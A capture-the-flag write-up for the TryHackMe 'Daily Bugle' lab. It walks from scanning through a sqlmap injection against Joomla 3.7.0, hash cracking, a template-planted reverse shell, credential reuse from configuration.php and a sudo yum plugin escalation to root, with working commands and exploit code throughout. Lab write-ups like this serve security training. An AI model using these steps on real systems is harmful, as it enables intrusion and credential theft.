WriteUp — THM Daily Bugle

Jari Laurila
3 min read · Oct 31, 2020


Compromise a Joomla CMS account via SQLi, practise cracking hashes and escalate your privileges by taking advantage of yum.

This is a writeup for TryHackMe room Daily Bugle.


Looking at the website we see that it's a Joomla-powered site hosting a blog:

Let's run an nmap scan to get a feel for the exposed services:

nmap -sC -sV 10.10.27.244
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-27 18:09 EET
Nmap scan report for 10.10.27.244
Host is up (0.058s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
| 256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
|_ 256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-generator: Joomla! - Open Source Content Management
| http-robots.txt: 15 disallowed entries
| /joomla/administrator/ /administrator/ /bin/ /cache/
| /cli/ /components/ /includes/ /installation/ /language/
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
|_http-title: Home
3306/tcp open mysql MariaDB (unauthorized)

SSH and MariaDB offer nothing without credentials, so it's best to focus on the web server. Enumerating it with gobuster reveals the standard Joomla directory layout (already listed in robots.txt) plus a few readable files, of which README.txt and /administrator are the interesting ones:

gobuster -q -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 -u http://10.10.45.163 -x txt,php dir
/images (Status: 301)
/media (Status: 301)
/templates (Status: 301)
/index.php (Status: 200)
/modules (Status: 301)
/bin (Status: 301)
/plugins (Status: 301)
/includes (Status: 301)
/language (Status: 301)
/README.txt (Status: 200)
/components (Status: 301)
/cache (Status: 301)
/libraries (Status: 301)
/robots.txt (Status: 200)
/tmp (Status: 301)
/LICENSE.txt (Status: 200)
/layouts (Status: 301)
/administrator (Status: 301)
/configuration.php (Status: 200)
/htaccess.txt (Status: 200)
/cli (Status: 301)

Navigating to /administrator reveals the Joomla login page. The task description tells us that the installed version is vulnerable, so search exploit-db for a matching exploit. The one used below targets the unauthenticated SQL injection in the list[fullordering] parameter of com_fields, which affects Joomla 3.7.0 (CVE-2017-8917):
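Rather than taking the task description's word for it, the version can be read from the manifest that Joomla 3.x ships at administrator/manifests/files/joomla.xml. The script below is an added example, not part of the original writeup: the target URL passed to joomla_version is an assumption and the manifest it parses is a constructed sample with the shape a real one has.

```shell
#!/bin/sh
# Added example, not part of the original writeup: confirm the Joomla
# version from the manifest Joomla 3.x ships at
# administrator/manifests/files/joomla.xml instead of trusting the task text.
# The target URL passed to joomla_version is an assumption.

# Pull <version>x.y.z</version> out of a Joomla manifest read from stdin.
joomla_version_from_manifest() {
    sed -n 's/.*<version>\([0-9][0-9.]*\)<\/version>.*/\1/p' | head -n 1
}

# Fetch the manifest from a live target (needs network; not exercised here).
joomla_version() {
    target="${1%/}"
    curl -s "$target/administrator/manifests/files/joomla.xml" | joomla_version_from_manifest
}

# The com_fields list[fullordering] injection used on this page is
# CVE-2017-8917, which affects exactly 3.7.0 (fixed in 3.7.1).
vulnerable_to_cve_2017_8917() {
    [ "$1" = "3.7.0" ]
}

# Constructed sample manifest (not captured from the target).
SAMPLE_MANIFEST='<?xml version="1.0" encoding="UTF-8"?>
<extension version="3.6" type="file" method="upgrade">
    <name>files_joomla</name>
    <version>3.7.0</version>
</extension>'

# Parse the sample and report whether that version is in scope.
sample_check() {
    v=$(printf '%s\n' "$SAMPLE_MANIFEST" | joomla_version_from_manifest)
    if vulnerable_to_cve_2017_8917 "$v"; then
        echo "Joomla $v: vulnerable to CVE-2017-8917"
    else
        echo "Joomla $v: not affected by CVE-2017-8917"
    fi
}

sample_check
```

Against a real target, `joomla_version http://10.10.27.244` does the fetch; the parser is kept separate so it can be run on a saved copy of the manifest as well.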

Based on this exploit, let sqlmap drive the injection and dump the Joomla users table (the database and table names come from sqlmap's --dbs and --tables enumeration first; the table prefix here is fb9j5_):

sqlmap -u "http://10.10.38.215/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p "list[fullordering]" -D joomla -T fb9j5_users --dump

There is only one superuser, "jonah". Save the bcrypt hash to a file and crack it with John the Ripper:

john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
__REDACTED__ (jonah)

Let's first check whether the cracked password also works over SSH. It doesn't. Log in to the Joomla administrator console instead and edit the active template's index.php to include php-reverse-shell. (It would be better to add a separate file to the template so the reverse shell doesn't block regular use of the site.)

Now we can pop a shell as the apache user. Upgrade the TTY using Python:

python -c 'import pty; pty.spawn("/bin/bash")'

Enumerate the server with linPEAS. Nothing immediately interesting.

The Joomla configuration.php, readable by the apache user, holds the MySQL credentials:

public $user = 'root';
public $password = '__REDACTED__';

Could this be jjameson's password too (password reuse)?

su - jjameson

Yes it is. Grab the user flag, then SSH in as jjameson for a proper terminal.
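The password-reuse check above can be made systematic: pull the database credentials out of configuration.php and pair them with every local account that has a real login shell. The script below is an added example, not from the original writeup; the configuration.php and passwd contents are constructed samples (the password is a placeholder), and the /var/www/html path mentioned in the usage note is an assumption about where the site lives.

```shell
#!/bin/sh
# Added example, not part of the original writeup: pull the database
# credentials out of Joomla's configuration.php (readable by the web server
# user) and list the local accounts worth trying them against.
# The sample config and passwd contents below are constructed, not captured
# from the room.

# Print one property of a Joomla configuration.php: $1 = file, $2 = name
# (user, password, db, host, ...). Joomla writes them as
#     public $password = 'value';
joomla_config_value() {
    sed -n "s/^[[:space:]]*public[[:space:]]*[\$]$2[[:space:]]*=[[:space:]]*'\([^']*\)'[[:space:]]*;.*/\1/p" "$1" | head -n 1
}

# Local accounts with a real login shell: the natural targets for password
# reuse. $1 = passwd file (defaults to /etc/passwd).
login_users() {
    awk -F: '$3 >= 1000 && $3 < 65534 && $7 !~ /(nologin|false)$/ { print $1 }' "${1:-/etc/passwd}"
}

# Emit "account dbuser dbpassword" lines: each login account paired with the
# DB credentials, ready to try with su or ssh.
reuse_candidates() {
    cfg="$1"
    passwd="$2"
    dbuser=$(joomla_config_value "$cfg" user)
    dbpass=$(joomla_config_value "$cfg" password)
    login_users "$passwd" | while read -r acct; do
        printf '%s %s %s\n' "$acct" "$dbuser" "$dbpass"
    done
}

# Constructed sample configuration.php (placeholder password).
SAMPLE_CFG=$(mktemp)
cat >"$SAMPLE_CFG" <<'EOF'
<?php
class JConfig {
    public $dbtype = 'mysqli';
    public $host = 'localhost';
    public $user = 'root';
    public $password = 'not-the-real-one';
    public $db = 'joomla';
    public $dbprefix = 'fb9j5_';
}
EOF

# Constructed sample passwd: one interactive user among service accounts.
SAMPLE_PASSWD=$(mktemp)
cat >"$SAMPLE_PASSWD" <<'EOF'
root:x:0:0:root:/root:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
jjameson:x:1000:1000::/home/jjameson:/bin/bash
nobody:x:65534:65534:Kernel Overflow User:/:/sbin/nologin
EOF

reuse_candidates "$SAMPLE_CFG" "$SAMPLE_PASSWD"
```

On the box itself, `reuse_candidates /var/www/html/configuration.php /etc/passwd` (path assumed) prints the account/password pairs; each one is then a manual `su - <account>` or SSH attempt, since su reads the password from the terminal rather than stdin.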

Privilege escalation

linPEAS showed no immediate privilege-escalation vector, so let's see what jjameson is allowed to run as root:

sudo -l
User jjameson may run the following commands on dailybugle:
    (ALL) NOPASSWD: /usr/bin/yum

Passwordless sudo on yum. For sudo abuse head to GTFOBins: its yum entry points yum at a config file we control, which in turn loads a plugin we control, and yum runs that plugin as root:

TF=$(mktemp -d)

# yum config that enables plugins and looks for them in our temp dir
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF

# per-plugin config enabling plugin "y"
cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF

# the plugin itself: init_hook fires as soon as yum loads it, as root
cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
    os.execl('/bin/sh','/bin/sh')
EOF

sudo yum -c $TF/x --enableplugin=y

BOOM! We are root. The takeaway for defenders: because -c and --enableplugin let the caller pick the config file and plugin directory, any sudo rule that lets a user pass arbitrary arguments to yum is equivalent to granting root.
